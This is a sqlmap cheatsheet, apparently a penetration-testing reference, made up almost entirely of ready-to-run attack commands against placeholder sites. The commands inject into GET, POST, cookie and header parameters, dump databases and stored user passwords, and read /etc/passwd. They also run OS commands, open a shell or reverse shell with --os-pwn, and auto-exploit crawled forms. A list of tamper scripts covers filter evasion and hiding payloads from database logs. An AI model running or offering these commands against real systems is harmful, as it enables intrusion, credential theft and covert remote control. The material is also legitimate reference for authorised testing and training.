SQLMap - Cheatsheet

Basic arguments for SQLmap

Generic

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only the UNION query (U) and boolean-based blind (B) techniques, in that order (default "BEUSTQ")
--batch #Non-interactive mode: sqlmap normally asks you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify UNION SQLi with an unusual union char

Retrieve Information

Internal

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames of DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

DB data

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Injection place

From Burp/ZAP capture

Capture the request and create a req.txt file
sqlmap -r req.txt --current-user

GET Request Injection

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection

sqlmap -u "http://example.com" --data "username=*&password=*"

Injections in Headers and other HTTP Methods

#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Indicate string when injection is successful

--string="string_showed_when_TRUE"

Eval

Sqlmap allows the use of -e or --eval to process each payload before sending it with a Python one-liner. This makes it very easy and fast to transform the payload in custom ways before it is sent. In the following example the Flask session cookie is signed with the known secret before being sent:
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

Shell

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Read File

--file-read=/etc/passwd

Crawl a website with SQLmap and auto-exploit

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non-interactive mode: sqlmap normally asks you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Second Order Injection

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs

Customizing Injection

Set a suffix

python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "

Prefix

python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "

Help finding boolean injection

# --not-string "string" helps find a string that does not appear in True responses (for finding boolean-based blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

nonrecursivereplacement.py: Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters
percentage.py: Adds a percentage sign ('%') in front of each character
overlongutf8.py: Converts all (non-alphanumeric) characters in a given payload to overlong UTF-8 (not processing already encoded ones)
randomcase.py: Replaces each keyword character with a random-case value
randomcomments.py: Adds random comments to SQL keywords
securesphere.py: Appends a specially crafted string
sp_password.py: Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
space2comment.py: Replaces space character (' ') with comments
space2dash.py: Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
space2hash.py: Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2morehash.py: Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2mssqlblank.py: Replaces space character (' ') with a random blank character from a valid set of alternate characters
space2mssqlhash.py: Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
space2mysqlblank.py: Replaces space character (' ') with a random blank character from a valid set of alternate characters
space2mysqldash.py: Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
space2plus.py: Replaces space character (' ') with plus ('+')
space2randomblank.py: Replaces space character (' ') with a random blank character from a valid set of alternate characters
symboliclogical.py: Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
unionalltounion.py: Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes.py: Replaces quote character (') with a multi-byte combo %bf%27 together with a generic comment at the end (to make it work)
uppercase.py: Replaces each keyword character with its upper-case value (e.g. 'INSERT')
varnish.py: Appends an HTTP header 'X-originating-IP'
versionedkeywords.py: Encloses each non-function keyword with a versioned MySQL comment
versionedmorekeywords.py: Encloses each keyword with a versioned MySQL comment
xforwardedfor.py